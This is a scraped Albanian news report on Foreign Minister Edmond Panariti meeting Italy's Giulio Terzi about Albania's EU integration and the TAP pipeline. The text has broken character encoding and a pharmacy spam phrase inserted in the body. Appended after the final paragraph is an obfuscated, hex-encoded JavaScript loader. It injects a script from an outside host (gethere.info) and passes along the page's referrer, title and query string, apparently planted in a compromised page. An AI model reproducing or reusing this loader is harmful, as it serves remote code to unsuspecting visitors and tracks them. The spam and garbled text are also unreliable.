largea_panariti-terzi1353404538

Terzi-Panaritit: Rikonfirmoj mbA�shtetjen e ItalisA� pA�r integrimin

365 pills online pharmacy. Ministri i PunA�ve tA� Jashtme, Edmond Panariti, gjatA� vizitA�s sA� tij nA� Bruksel u takua me Ministrin e PunA�ve tA� Jashtme tA� ItalisA�, Giulio Terzi. NA� qendA�r tA� takimit ishte ecuria e deritanishme e bashkA�punimit dypalA�sh, zhvillimet politike dhe ecuria e procesit tA� integrimit evropian tA� ShqipA�risA� etj.

Ministri Panariti falenderoi Ministrin Terzi pA�r ndihmA�n e vazhdueshme qA� Italia ka dhA�nA� dhe vazhdon t’i japA� ShqipA�risA�, si nA� planin dypalA�sh ashtu edhe kuadrin e proceseve tA� integrimit europian. Ministri Terzi ka rikonfimuar edhe njA�herA� angazhimin e ItalisA� nA� mbA�shtetje tA� procesit tA� integrimit evropian tA� Shqperise, por e vuri theksin tek rA�ndA�sia qA� merr plotA�simi i tA� gjitha rekomandimeve tA� vendosura nga ana e Komisionit Evropian pA�r statusin e vendit kandidat pA�r ShqipA�rinA�. “Italia do tA� mbA�shtesA� fuqimisht ShqipA�rinA� nA� rrugA�n e saj drejt integrmit nA� BE, por A�shtA� e rA�ndA�sishme qA� vetA� klasa politike shqiptare tA� angazhohet fuqimisht nA� kA�tA� proces”, citohet tA� ketA� thA�nA� Terzi.

NjA� tjetA�r A�A�shtje e rA�ndA�sishme qA� u trajtua gjatA� kA�tij takimi ishte bashkA�punimi midis dy vendeve nA� drejtim tA� realizimit tA� projektit tA� gazsjellA�sit Trans Adriatik Pipeline (TAP). Ministri Panariti e njohu homologun e tij italian me pA�rpjekjet qA� po bA�n pala shqiptare nA� drejtim tA� plotA�simit e tA� gjithA� kuadrit tA� nevojshA�m ligjor qA� ka tA� bA�jA� me kA�tA� vepA�r tA� rA�ndA�sishme pA�r vendet e pA�rfshira nA� tA�.

TA� dy bashkA�biseduesit shprehA�n gadishmA�rinA� e qeverive respektive, pA�r tA� pA�rfunduar sa mA� shpejt qA� tA� jetA� mundur procedurat e nevojshme pA�r nA�nshkrimin e MarrA�veshjes NdA�qeveritare midis ItalisA�, GreqisA� dhe ShqipA�risA� pA�r gazsjellA�sin TAP.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}